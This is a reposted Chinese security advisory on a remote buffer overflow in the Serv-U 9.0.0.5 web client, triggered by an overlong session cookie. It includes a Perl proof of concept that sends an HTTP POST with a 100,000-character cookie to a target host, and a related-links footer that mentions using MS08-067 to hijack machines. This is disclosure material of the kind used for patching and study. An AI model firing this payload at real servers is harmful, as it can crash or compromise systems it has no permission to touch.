Serv-U Web客户端HTTP请求远程溢出漏洞

Serv-U Web客户端HTTP请求远程溢出漏洞

影响版本:

RhinoSoft Serv-U 9.0.0.5

漏洞描述:

BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。

---snip--- 
use IO::Socket; 

$|=1; 
$a = "A" x 100000; 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '80', 
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n" 
."Host: $ARGV[0]\r\n" 
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_
d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814
06246bf8$a\r\n" 
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" 
."Content-Length: 0\r\n\r\n"; 

while (<$sock>) { 
    print; 
} 
---snip--- 

【编辑推荐】

  1. C’Nedra网络插件Read_TCP_String远程溢出漏洞
  2. 利用MS08067远程溢出漏洞抓肉鸡
  3. Alt-N MDaemon IMAP Server CREATE命令远程溢出漏洞

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/121504.html<

(0)
运维的头像运维
上一篇2025-02-21 22:04
下一篇 2025-02-21 22:05

相关推荐

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注